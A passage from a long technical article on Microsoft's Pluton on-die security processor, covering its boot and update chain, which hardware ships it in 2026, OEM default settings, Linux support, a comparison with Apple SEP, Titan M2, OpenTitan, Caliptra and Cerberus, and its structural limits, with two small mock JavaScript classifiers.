&lt;p&gt;Pull the four choices together. Each closes a specific 2014-2024 attack class -- bus, shared-TEE, firmware-CVE, OEM-capsule patch latency. Each names a new trust placed in Microsoft -- silicon supply chain, chip-level isolation engineering, compiler and SDLC, signing key and Windows Update infrastructure. &lt;em&gt;On-die alone is not the breakthrough. The breakthrough is the combination.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The November 2020 announcement also commits to a property beyond TCG TPM 2.0: SHACK. &lt;em&gt;&quot;Pluton also provides the unique Secure Hardware Cryptography Key (SHACK) technology that helps ensure keys are never exposed outside of the protected hardware, even to the Pluton firmware itself&quot;&lt;/em&gt; [@ms-pluton-blog-2020]. The TCG TPM 2.0 specification requires that keys be non-exportable from the chip; SHACK extends the boundary one ring inward, naming a class of keys that the firmware running on Pluton itself cannot read. This is Microsoft&apos;s claim that Pluton offers a &lt;em&gt;stronger&lt;/em&gt; property than the TCG TPM 2.0 spec requires. Verifying that claim from outside Microsoft requires source access Microsoft has not published.&lt;/p&gt;

A Pluton property named in the November 17, 2020 announcement [@ms-pluton-blog-2020]; Microsoft&apos;s claim that Pluton&apos;s non-exportability boundary extends one ring inside the TCG TPM 2.0 boundary, so keys are unreadable even by Pluton firmware. See the §5 prose paragraph above for the verbatim Microsoft quote and the article&apos;s hedge that no external peer-reviewed validation of SHACK exists as of 2026.
&lt;h3&gt;How the chip boots and how the chip gets patched&lt;/h3&gt;
&lt;p&gt;The boot-and-attest sequence below is the public shape of how Pluton starts and how new firmware reaches it. The exact ROM-to-FMC-to-runtime chain is generic to on-die RoT designs (Caliptra exposes this shape openly in its source [@caliptra-github]); Pluton&apos;s specific protocol details are not all on the public record, so the diagram captures the architectural shape rather than a Microsoft-internal protocol.&lt;/p&gt;

sequenceDiagram
    participant SoC as SoC reset
    participant ROM as Pluton ROM
    participant FMC as Pluton FMC
    participant RT as Pluton runtime
    participant Win as Windows + WU
    SoC-&amp;gt;&amp;gt;ROM: power-on, Pluton enters ROM
    ROM-&amp;gt;&amp;gt;ROM: verify FMC signature against on-die public key
    ROM-&amp;gt;&amp;gt;FMC: hand off after measurement
    FMC-&amp;gt;&amp;gt;FMC: verify runtime signature
    FMC-&amp;gt;&amp;gt;RT: hand off, runtime exposes TPM 2.0 CRB
    RT--&amp;gt;&amp;gt;Win: TPM 2.0 commands over CRB
    Win-&amp;gt;&amp;gt;Win: Patch Tuesday delivers signed Pluton blob
    Win-&amp;gt;&amp;gt;RT: stage new firmware via OS update channel
    RT-&amp;gt;&amp;gt;FMC: queue new runtime, reboot to apply
    FMC-&amp;gt;&amp;gt;FMC: verify new runtime signature, commit
&lt;p&gt;The detection logic that follows is the structural shape of the &lt;code&gt;Get-Tpm&lt;/code&gt; PowerShell query that section 10 will revisit. It is mocked here to make the four-letter &lt;code&gt;MSFT&lt;/code&gt; check explicit.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Mock of the Windows TPM Base Services (TBS) manufacturer query. // Real Get-Tpm reads ManufacturerIdTxt from the TPM 2.0 capability // response and matches the four-character ASCII manufacturer. const manufacturers = {   &apos;MSFT&apos;: &apos;Microsoft Pluton&apos;,   &apos;INTC&apos;: &apos;Intel PTT (firmware TPM in CSME)&apos;,   &apos;AMD &apos;: &apos;AMD fTPM (firmware TPM in PSP)&apos;,   &apos;IFX&apos;:  &apos;Infineon discrete TPM&apos;,   &apos;STM&apos;:  &apos;STMicro discrete TPM&apos;,   &apos;NTC&apos;:  &apos;Nuvoton discrete TPM&apos;, }; function classify(mfr) {   return manufacturers[mfr] || &apos;Unknown / non-TCG TPM&apos;; } console.log(&apos;MSFT  =&amp;gt;&apos;, classify(&apos;MSFT&apos;)); console.log(&apos;INTC  =&amp;gt;&apos;, classify(&apos;INTC&apos;)); console.log(&apos;AMD   =&amp;gt;&apos;, classify(&apos;AMD &apos;)); console.log(&apos;IFX   =&amp;gt;&apos;, classify(&apos;IFX&apos;));&lt;/code&gt;}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Pluton breakthrough is the &lt;em&gt;combination&lt;/em&gt;, not on-die alone. On-die plus dedicated TEE plus memory-safe firmware plus OS-channel updates -- four design choices, each closing a different 2014-2024 attack class, each placing a new trust in Microsoft. The chip is the cheapest part of the system. The cost is what those four trusts add up to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What is actually shipping in 2026? Hardware lists, default-on / default-off behavior, vendor pushback that survived from 2022 into 2026 -- the gap between marketing claim and shipping reality.&lt;/p&gt;
&lt;h2&gt;6. Pluton in 2026 -- what is shipping, where, and how to verify&lt;/h2&gt;
&lt;p&gt;The 2020 announcement is now five and a half years old. The 2022 first-silicon shipment is four. What is the actual fleet shape in 2026?&lt;/p&gt;
&lt;h3&gt;The Microsoft-published hardware list&lt;/h3&gt;
&lt;p&gt;The current Microsoft Learn Pluton page enumerates the supported silicon: AMD Ryzen 6000, 7000, 8000, 9000, and Ryzen AI; Intel Core Ultra 200V Series, Ultra Series 3, and Series 3; and Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series [@ms-learn-pluton]. Every chip on that list ships with Pluton silicon present on the die. &lt;em&gt;Present&lt;/em&gt; and &lt;em&gt;enabled by default&lt;/em&gt; are not the same property, which is the point of the next subsection.&lt;/p&gt;
&lt;h3&gt;Default-on versus default-off varies by OEM SKU&lt;/h3&gt;
&lt;p&gt;The first x86 silicon to ship with Pluton was AMD Ryzen 6000 &quot;Rembrandt&quot;, at CES 2022. Phoronix&apos;s launch coverage [@phoronix-2022-amd-ryzen-pluton] confirms that the CES 2022 keynote disclosed the integration. The vendor responses that followed in March 2022 set the OEM-by-OEM posture that the fleet still reflects in 2026. The Register obtained vendor statements [@register-2022-pluton]. Lenovo deployed the chip on AMD Ryzen 6000 ThinkPads but disabled it: &lt;em&gt;&quot;AMD Ryzen 6000 ThinkPads will include Pluton as it&apos;s present in those AMD chips, though the feature will be disabled by default&quot;&lt;/em&gt;; Intel-powered ThinkPads &lt;em&gt;&quot;will not support Microsoft Pluton at launch&quot;&lt;/em&gt;; the Snapdragon 8cx Gen 3 Lenovo X13s did include Pluton [@register-2022-pluton]. Dell&apos;s reply was the most direct: &lt;em&gt;&quot;Pluton does not align with Dell&apos;s approach to hardware security and our most secure commercial PC requirements&quot;&lt;/em&gt; [@register-2022-pluton] [@pcworld-2022-pluton]. HP declined to comment.&lt;/p&gt;
&lt;p&gt;The 2024 inflection is the Copilot+ PC program. Microsoft Surface and Qualcomm Snapdragon X Elite / Snapdragon X Series Copilot+ devices ship Pluton enabled by default [@ms-learn-pluton]. This is the first product class where retail-bought Windows 11 hardware turns Pluton on at the factory.The 2024 Copilot+ inflection is the first time a high-volume consumer Windows-PC SKU ships Pluton on by default. Prior to Copilot+, Pluton was either off (Lenovo AMD Ryzen 6000 ThinkPads), absent (Dell), or behind a BIOS toggle the user had to find. Copilot+ collapses the discoverability problem because Windows 11 itself depends on the secure-boot and credential-protection primitives that Pluton hosts when the OEM has enabled it.&lt;/p&gt;
&lt;h3&gt;Linux 6.3 -- February 20, 2023&lt;/h3&gt;
&lt;p&gt;The standard TCG Command Response Buffer (CRB) interface that Pluton exposes is reachable from Linux. Phoronix records the merge: &lt;em&gt;&quot;Linus Torvalds merged to Linux 6.3 Git the TPM CRB support for Microsoft&apos;s controversial Pluton security co-processor&quot;&lt;/em&gt; [@phoronix-2023-pluton-linux63] [@kernel-org-pluton-merge]. The driver author was Matthew Garrett [@kernel-org-pluton-merge]. Pluton-as-TPM is now reachable from non-Windows operating systems via the standard TCG CRB transport. This constrains -- although it does not eliminate -- the &quot;Microsoft-only black box&quot; narrative. The chip speaks the open TCG wire protocol that any operating system can talk to.&lt;/p&gt;
&lt;h3&gt;Garrett&apos;s reverse-engineering -- April 2022&lt;/h3&gt;
&lt;p&gt;Matthew Garrett&apos;s April 2022 disassembly of the Asus ROG Zephyrus G14 BIOS [@garrett-2022-pluton-rev] yielded two facts that matter for the rest of this article. First, the user-controllable BIOS Pluton (HSP) toggle on AMD Ryzen 6000 may not be a hardware power-down. Garrett&apos;s reading: &lt;em&gt;&quot;PSP directory entry 0xB BIT36 ... if bit 36 is set, the PSP tells Pluton to turn itself off and will no longer send any commands to it&quot;&lt;/em&gt; [@garrett-2022-pluton-rev]. The toggle is a soft fuse. Inventory queries that report &quot;Pluton present&quot; do not always distinguish enabled from soft-disabled. Second, &lt;em&gt;&quot;there&apos;s a blob starting at 0x0069b610 that appears to be firmware for Pluton -- it contains chunks that appear to be the reference TPM2 implementation, and it broadly decompiles as valid ARM code&quot;&lt;/em&gt; [@garrett-2022-pluton-rev]. The Pluton firmware blob is, on the silicon Garrett looked at, an ARM image derived from the TCG TPM 2.0 reference code. That is the observation that makes CVE-2025-2884 (section 8) reachable inside Pluton firmware too.&lt;/p&gt;

On AMD Ryzen 6000 / 7000 / 8000 platforms, the OEM can set PSP directory entry 0xB bit 36 in the AMD-firmware part of the BIOS to instruct the PSP to *&quot;tell Pluton to turn itself off&quot;* [@garrett-2022-pluton-rev]. This is a soft fuse, not a hardware power-down. The host&apos;s TPM advertisement (`Get-Tpm`) does not always distinguish enabled-Pluton from soft-disabled-Pluton; verification requires inspecting the BIOS-level Pluton (HSP) toggle directly, or correlating against the Plug-and-Play device list.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Garrett&apos;s PSP-directory soft-fuse documentation [@garrett-2022-pluton-rev] is the practical pitfall of any 2026 Pluton procurement audit. An OEM can ship AMD Ryzen 6000 / 7000 / 8000 silicon with Pluton soft-disabled at boot. Inventory queries that count &quot;Pluton-present&quot; SKUs without correlating against the BIOS-level Pluton (HSP) toggle will overcount by an unknown margin. Section 10 walks the practical detection path.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fleet shape, in one comparison table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;First shipped&lt;/th&gt;
&lt;th&gt;Default state at launch&lt;/th&gt;
&lt;th&gt;Vendor posture today&lt;/th&gt;
&lt;th&gt;Linux support&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;AMD Ryzen 6000 mobile&lt;/td&gt;
&lt;td&gt;January 2022 [@phoronix-2022-amd-ryzen-pluton]&lt;/td&gt;
&lt;td&gt;Off on Lenovo ThinkPad [@register-2022-pluton]; Dell declined [@pcworld-2022-pluton]&lt;/td&gt;
&lt;td&gt;Per-OEM; soft-fuse trap on Lenovo&lt;/td&gt;
&lt;td&gt;Linux 6.3 CRB driver [@phoronix-2023-pluton-linux63]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMD Ryzen 7000 / 8000 / 9000 / Ryzen AI&lt;/td&gt;
&lt;td&gt;2023-2025&lt;/td&gt;
&lt;td&gt;Per-OEM SKU&lt;/td&gt;
&lt;td&gt;Microsoft Learn lists as supported [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Same CRB driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel Core Ultra 200V / Series 3&lt;/td&gt;
&lt;td&gt;2024-2025&lt;/td&gt;
&lt;td&gt;Per-OEM SKU&lt;/td&gt;
&lt;td&gt;Microsoft Learn lists as supported [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Same CRB driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Snapdragon 8cx Gen 3 (Lenovo X13s)&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;On at launch [@register-2022-pluton]&lt;/td&gt;
&lt;td&gt;Shipping&lt;/td&gt;
&lt;td&gt;Same CRB driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Snapdragon X Series Copilot+ PCs&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;On by default [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Microsoft + Qualcomm core program&lt;/td&gt;
&lt;td&gt;Same CRB driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Surface Copilot+&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;On by default [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;First-party Microsoft hardware&lt;/td&gt;
&lt;td&gt;Same CRB driver&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    AMD[AMD Ryzen 6000-9000&lt;br /&gt;+ Ryzen AI]
    Intel[Intel Core Ultra 200V&lt;br /&gt;Series 3]
    Qualcomm[Qualcomm Snapdragon&lt;br /&gt;8cx Gen 3 + X Series]
    Lenovo[Lenovo&lt;br /&gt;ThinkPad / X13s]
    Dell[Dell&lt;br /&gt;commercial]
    HP[HP&lt;br /&gt;commercial]
    Surface[Microsoft Surface&lt;br /&gt;Copilot+]
    OEMx[Snapdragon X&lt;br /&gt;Copilot+ OEMs]
    Off[Default off&lt;br /&gt;at launch]
    Vendor[Vendor declined&lt;br /&gt;to ship]
    On[Default on&lt;br /&gt;at retail]
    AMD --&amp;gt; Lenovo
    AMD --&amp;gt; Dell
    AMD --&amp;gt; HP
    Intel --&amp;gt; Lenovo
    Qualcomm --&amp;gt; Lenovo
    Qualcomm --&amp;gt; Surface
    Qualcomm --&amp;gt; OEMx
    Lenovo --&amp;gt;|2022 Ryzen 6000| Off
    Dell --&amp;gt;|&quot;does not align&quot;| Vendor
    HP --&amp;gt;|declined comment| Vendor
    Lenovo --&amp;gt;|X13s 8cx Gen 3| On
    Surface --&amp;gt; On
    OEMx --&amp;gt; On
&lt;p&gt;The detection logic for the Garrett soft-fuse trap, mocked here so the structural shape is explicit:&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Mock of the PSP directory entry 0xB inspection that Garrett 2022 // documented. Real verification reads the AMD-firmware bytes off the // SPI flash; this demonstrates the bit-36 check that decides // &quot;enabled&quot; vs &quot;soft-disabled&quot;. function plutonState(plutonPresent, pspDir0xB_BIT36) {   if (!plutonPresent) return &apos;absent&apos;;   if (pspDir0xB_BIT36 === 1) return &apos;soft-disabled&apos;;  // PSP told to silence Pluton   return &apos;enabled&apos;; } console.log(&apos;Pluton present, BIT36=0 =&amp;gt;&apos;, plutonState(true, 0)); console.log(&apos;Pluton present, BIT36=1 =&amp;gt;&apos;, plutonState(true, 1)); console.log(&apos;No Pluton silicon       =&amp;gt;&apos;, plutonState(false, 0));&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Pluton is not the only on-die security processor in 2026. Apple has the Secure Enclave Processor. Google has Titan M2. The OCP coalition has Caliptra. How does Pluton compare, and what does the comparison reveal about Microsoft&apos;s design choices?&lt;/p&gt;
&lt;h2&gt;7. Competing approaches -- Apple SEP, Google Titan M2, OpenTitan, Caliptra, Cerberus&lt;/h2&gt;
&lt;p&gt;Pluton is not alone. The platforms below are its nearest analogues -- the strongest evidence that Microsoft&apos;s design choices were &lt;em&gt;choices&lt;/em&gt;, not technical necessities.&lt;/p&gt;
&lt;h3&gt;Apple Secure Enclave Processor&lt;/h3&gt;
&lt;p&gt;Apple&apos;s &lt;em&gt;Apple Platform Security&lt;/em&gt; documentation describes SEP as &lt;em&gt;&quot;a dedicated secure subsystem integrated into Apple [SoC] ... isolated from the main processor to provide an extra layer of security&quot;&lt;/em&gt; [@apple-sep]. By deployment count it is the most mature single-vendor on-die security processor on the planet -- shipping in every iPhone since the iPhone 5s (2013), every iPad since iPad Air, and every Apple-silicon Mac [@apple-sep] [@wikipedia-apple-silicon]. The architecture has matured generation by generation: a Boot ROM as the hardware root of trust; an Apple-customised L4 microkernel; a Memory Protection Engine that combines AES-XEX with CMAC and an anti-replay tree on A11 / S4 and later; a Boot Monitor on A13 and later that hashes the loaded image and updates the SCIP (System Coprocessor Integrity Protection) settings before transferring control; and on A14 / M1 and later, the Memory Protection Engine &lt;em&gt;&quot;supports two ephemeral memory protection keys&quot;&lt;/em&gt; -- one for SEP-private data and a second one shared with the Secure Neural Engine [@apple-sep].&lt;/p&gt;
&lt;p&gt;The trade-off versus Pluton is not the architecture -- it is the &lt;em&gt;governance model&lt;/em&gt;. Apple owns the silicon, the operating system, the signing key, and the device. The multi-signer political question never arises because there is only one signer for every layer of the stack. The cost: complete lock-in. The Apple T2 line, which shipped in 2017-2020 Intel Macs as a discrete A10-derived security chip running bridgeOS, inherited the A10 Boot ROM [@wikipedia-apple-t2]. The A10 Boot ROM has the structurally important property that no Boot-ROM-resident bug can be patched without silicon respin -- which the &lt;em&gt;checkm8&lt;/em&gt; / &lt;em&gt;blackbird&lt;/em&gt; class of jailbreaks demonstrated end-to-end. T2 was discontinued June 5, 2023 [@wikipedia-apple-t2]. The lesson is direct: &lt;em&gt;renewable security&lt;/em&gt; (Seven Properties #6) is not optional. Even Apple&apos;s vertically integrated stack pays the price when a generation ships without it.&lt;/p&gt;

A dedicated secure subsystem integrated into Apple [SoC] ... isolated from the main processor to provide an extra layer of security. -- Apple, *Apple Platform Security* [@apple-sep]
&lt;h3&gt;Google Titan M / Titan M2 and OpenTitan&lt;/h3&gt;
&lt;p&gt;Google announced Titan M with the Pixel 3 launch in October 2018 [@pixel-3-titan-m]: &lt;em&gt;&quot;This year, with Pixel 3, we&apos;re advancing our investment in secure hardware with Titan M, an enterprise-grade security chip custom built for Pixel 3...&quot;&lt;/em&gt; [@pixel-3-titan-m]. Titan M2 followed with Pixel 6 in October 2021 [@pixel-6-titan-m2]. Both are discrete or in-package security chips on Pixel for Android Verified Boot, StrongBox-grade key storage, anti-rollback, and lock-screen verification. Both are Google-vertical: Google designs the chip, Google operates the cloud back end, Google ships the OS.&lt;/p&gt;
&lt;p&gt;OpenTitan is the open-source descendant. Hosted by lowRISC, it is &lt;em&gt;&quot;the first open source project building a transparent, high-quality reference design and integration guidelines for silicon root of trust (RoT) chips&quot;&lt;/em&gt; [@opentitan-home]. RISC-V Ibex core; hardware AES, HMAC, KMAC, and OTBN big-number engines; full RTL, ROM, and verification stack public; Apache 2.0 license. OpenTitan reached commercial availability on February 13, 2024 [@opentitan-commercial] -- the first open-source silicon project to do so. The press release names the nine coalition members verbatim: &lt;em&gt;&quot;Google, Winbond, Nuvoton, zeroRISC, Rivos, Western Digital, Seagate, ETH Zurich and Giesecke+Devrient, hosted by the non-profit lowRISC CIC&quot;&lt;/em&gt; [@opentitan-commercial]. OpenTitan is the closest existing answer to &quot;what would an open-source Pluton look like?&quot; -- but as of 2026 it is discrete or in-package, not on-die in an application SoC.The lowRISC press release is precise on a point that secondary press has frequently flubbed. lowRISC is the &lt;em&gt;host&lt;/em&gt; organisation for OpenTitan; it is not a member of the nine. The nine commercially announced coalition members on February 13, 2024 are Google, Winbond, Nuvoton, zeroRISC, Rivos, Western Digital, Seagate, ETH Zurich, and Giesecke+Devrient [@opentitan-commercial]. The distinction matters because lowRISC&apos;s role is governance, not deployment.&lt;/p&gt;
&lt;h3&gt;Caliptra&lt;/h3&gt;
&lt;p&gt;The OCP coalition&apos;s open-source datacenter Root of Trust. Specification, RTL, ROM, FMC, and runtime are public on CHIPS Alliance [@caliptra-github] [@caliptra-spec]. Founders: Microsoft, Google, AMD, NVIDIA. Google Cloud&apos;s Caliptra-1.0 announcement reports: &lt;em&gt;&quot;the Caliptra specification and open-source hardware and software implementation is complete, reaching the revision 1.0 milestone.&quot;&lt;/em&gt; The Google Cloud post adds that the Caliptra IP block is being integrated by member companies into chips expected in the market in 2026. Caliptra targets &lt;em&gt;&quot;datacenter-class SoCs like CPUs, GPUs, DPUs, TPUs&quot;&lt;/em&gt; [@caliptra-github]. It is not a Pluton substitute on Windows clients -- the form factor is different and the threat model assumes server-side operators.&lt;/p&gt;

The instinct, on reading that Caliptra is open-source and multi-vendor, is to ask why Microsoft does not just put Caliptra into the next Surface. Three reasons. First, form factor: Caliptra is a datacenter-SoC IP block; the integration target is a CPU / GPU / DPU / TPU package on a \$20,000 server motherboard, not a \$700 ultrabook. Second, signer model: Caliptra is multi-vendor *by deployment*, but each Caliptra-equipped chip still has *one* signer -- the integrating chip vendor (AMD signs AMD&apos;s Caliptra firmware; NVIDIA signs NVIDIA&apos;s). The choice of signer moved; the count of signers per chip did not. Third, threat model: Caliptra&apos;s RTM serves a server attestation flow ending at a fleet operator (Google, Microsoft, NVIDIA, the rack owner), not a client BitLocker flow that has to survive a powered-off laptop on an airport conveyor belt.&lt;p&gt;Caliptra is the right counter-design to the &lt;em&gt;governance&lt;/em&gt; of Pluton, not its &lt;em&gt;form factor&lt;/em&gt;. It is what makes the single-signer-per-chip choice in Pluton-on-PC visible as a choice, not a technical necessity. That visibility is the whole reason this section exists.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Project Cerberus -- still in production&lt;/h3&gt;
&lt;p&gt;Cerberus has not been retired. Microsoft Learn describes it as &lt;em&gt;&quot;a NIST 800-193 compliant hardware root-of-trust with an identity that cannot be cloned&quot;&lt;/em&gt; [@ms-learn-cerberus] [@nist-sp-800-193] running in Azure datacenters; the GitHub reference implementation [@azure-cerberus-github] is actively maintained. In the November 2020 Pluton announcement, Microsoft framed Cerberus as the &lt;em&gt;server-side&lt;/em&gt; counterpart to Pluton&apos;s client-side root of trust [@ms-pluton-blog-2020] -- the two are designed to compose, with Pluton providing the per-CPU identity that an upstream Cerberus chip (or Caliptra-equipped server) can attest. The distinction between Pluton-as-client-RoT and Cerberus-as-server-RoT is operational, not architectural rivalry.&lt;/p&gt;
&lt;h3&gt;The cross-design comparison&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Pluton-on-PC&lt;/th&gt;
&lt;th&gt;Apple SEP&lt;/th&gt;
&lt;th&gt;Google Titan M2&lt;/th&gt;
&lt;th&gt;Caliptra&lt;/th&gt;
&lt;th&gt;Cerberus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Physical location&lt;/td&gt;
&lt;td&gt;On-die in application SoC&lt;/td&gt;
&lt;td&gt;On-die in Apple SoC&lt;/td&gt;
&lt;td&gt;Discrete or in-package on Pixel&lt;/td&gt;
&lt;td&gt;On-die in datacenter SoC&lt;/td&gt;
&lt;td&gt;Discrete on server BMC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust anchor&lt;/td&gt;
&lt;td&gt;Microsoft (chip-firmware signer)&lt;/td&gt;
&lt;td&gt;Apple (vertical)&lt;/td&gt;
&lt;td&gt;Google (vertical)&lt;/td&gt;
&lt;td&gt;Per-chip integrator&lt;/td&gt;
&lt;td&gt;Operator (Microsoft on Azure)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Update channel&lt;/td&gt;
&lt;td&gt;Windows Update [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;iOS / macOS update&lt;/td&gt;
&lt;td&gt;Android / Pixel update&lt;/td&gt;
&lt;td&gt;Server-side platform update&lt;/td&gt;
&lt;td&gt;OEM / operator update&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firmware language&lt;/td&gt;
&lt;td&gt;Rust (2024+) [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Apple-customised L4 [@apple-sep]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed&lt;/td&gt;
&lt;td&gt;Open-source firmware [@caliptra-github]&lt;/td&gt;
&lt;td&gt;C / C++ (open) [@azure-cerberus-github]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Open source&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Closed (driver public)&lt;/td&gt;
&lt;td&gt;Open (RTL + firmware)&lt;/td&gt;
&lt;td&gt;Open (RI on GitHub)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-signer&lt;/td&gt;
&lt;td&gt;Single&lt;/td&gt;
&lt;td&gt;Single&lt;/td&gt;
&lt;td&gt;Single&lt;/td&gt;
&lt;td&gt;Multi-vendor by deployment&lt;/td&gt;
&lt;td&gt;Per-deployment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Standards exposure&lt;/td&gt;
&lt;td&gt;TCG TPM 2.0 over CRB&lt;/td&gt;
&lt;td&gt;Apple-private&lt;/td&gt;
&lt;td&gt;Android Verified Boot, StrongBox&lt;/td&gt;
&lt;td&gt;Caliptra spec; SPDM 1.3 in 2.0&lt;/td&gt;
&lt;td&gt;NIST SP 800-193&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best-known structural attack&lt;/td&gt;
&lt;td&gt;None peer-reviewed Pluton-specific (TPMScan corpus only [@tpmscan-2024])&lt;/td&gt;
&lt;td&gt;T2 inherits A10 Boot ROM (checkm8) [@wikipedia-apple-t2]&lt;/td&gt;
&lt;td&gt;None public on Titan M2&lt;/td&gt;
&lt;td&gt;Reviewed open-source RTL&lt;/td&gt;
&lt;td&gt;Mature; deployed since 2017&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best suited for&lt;/td&gt;
&lt;td&gt;Windows 11 client procurement&lt;/td&gt;
&lt;td&gt;Apple devices&lt;/td&gt;
&lt;td&gt;Pixel devices&lt;/td&gt;
&lt;td&gt;Datacenter SoC integration&lt;/td&gt;
&lt;td&gt;Server BMC RoT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Form factor&lt;/td&gt;
&lt;td&gt;General-purpose PC&lt;/td&gt;
&lt;td&gt;Apple devices&lt;/td&gt;
&lt;td&gt;Pixel phones&lt;/td&gt;
&lt;td&gt;Datacenter SoCs&lt;/td&gt;
&lt;td&gt;Server motherboards&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The political question made architectural. Caliptra and OpenTitan answer &quot;what would multi-signer / open-source look like?&quot; in the &lt;em&gt;datacenter&lt;/em&gt;. Apple SEP demonstrates that the single-vendor / single-signer model is operationally durable at consumer scale -- but only when the vendor owns the entire stack. Pluton sits in the awkward middle: single-signer but multi-OEM, closed-firmware but open-Linux-driver, on-die but the chip vendor is not the firmware vendor. That middle position is what makes the procurement debate hard, and it is what makes the open problems in section 9 unresolved.&lt;/p&gt;
&lt;p&gt;Pluton is the strongest on-die RoT for Windows clients in 2026, with the clearest Microsoft-documented OS-delivered firmware-update path, the broadest hardware list, and the most mature design pedigree. What can it still not do?&lt;/p&gt;
&lt;h2&gt;8. What Pluton still cannot do&lt;/h2&gt;
&lt;p&gt;Two structural limits inherited from the prior article, and a third that is specific to single-signer on-die firmware. The first two say what &lt;em&gt;no&lt;/em&gt; on-die RoT can do. The third says what no &lt;em&gt;Microsoft-only-signer&lt;/em&gt; RoT can do. The worked example is CVE-2025-2884.&lt;/p&gt;
&lt;h3&gt;Limit 1 -- RTS+RTR, not RTE&lt;/h3&gt;
&lt;p&gt;A passive cryptoprocessor -- including Pluton -- cannot detect that the &lt;em&gt;wrong code&lt;/em&gt; measured itself. It can only refuse to release sealed material when PCRs do not match the stored policy. The prior article&apos;s section 7.1 [@prior-tpm-in-windows] walks the bit-level reasoning. On-die does not change this. Pluton implements Root of Trust for Storage and Root of Trust for Reporting; it does not implement a Root of Trust for Execution that runs the code outside the chip on the reader&apos;s behalf.&lt;/p&gt;
&lt;h3&gt;Limit 2 -- The VMK transits OS RAM at unseal&lt;/h3&gt;
&lt;p&gt;The Volume Master Key must enter RAM during Trusted Boot, and once unsealed it lives in OS-controlled memory. An attacker who reads OS RAM at the release moment, or any time after, defeats TPM-only BitLocker regardless of TPM strength (prior article sections 7.2 and 7.3 [@prior-tpm-in-windows]). Pluton&apos;s on-die location eliminates the dTPM &lt;em&gt;bus&lt;/em&gt; surface; it does not change which side of the unseal boundary the VMK lives on. This is why Virtualization-Based Security, Credential Guard, DRTM, and System Guard Secure Launch exist as &lt;em&gt;complements&lt;/em&gt;, not substitutes, to the TPM/Pluton primitive.&lt;/p&gt;
&lt;h3&gt;Limit 3 -- Single-signer revocation impossibility&lt;/h3&gt;
&lt;p&gt;This is the new one. State the result precisely: &lt;em&gt;if the on-die RoT firmware can only be authenticated by a single signer S, then the chip&apos;s trust anchor cannot be retired without bricking the chip&apos;s firmware-update path, regardless of whether S is compromised, coerced, or jurisdictionally constrained.&lt;/em&gt; This is not a cryptographic impossibility. It is a key-management impossibility. Revocation requires either (a) a second trust anchor provisioned at chip manufacture and held outside S&apos;s control -- i.e., multi-signer at the &lt;em&gt;chip&lt;/em&gt; level, not just at the &lt;em&gt;deployment&lt;/em&gt; level -- or (b) physical replacement of the silicon. Caliptra and Cerberus weaken the failure mode by &lt;em&gt;moving&lt;/em&gt; the signer to the integrating chip vendor or to the operator, but they do not eliminate it; each chip still has one signing root.&lt;/p&gt;

A key-management (not cryptographic) impossibility: a chip whose firmware-authentication root has one signer in ROM cannot have that signer retired without bricking the firmware-update path or replacing the silicon. Pluton-on-PC silicon shipping today bakes a Microsoft-rooted public key into ROM. See the §8 prose paragraph above and the Callout below for the precise statement of conditions and the operational reasoning (FIDO2 / threshold-signature analogues; §5 trust-shift cross-anchor).
&lt;blockquote&gt;
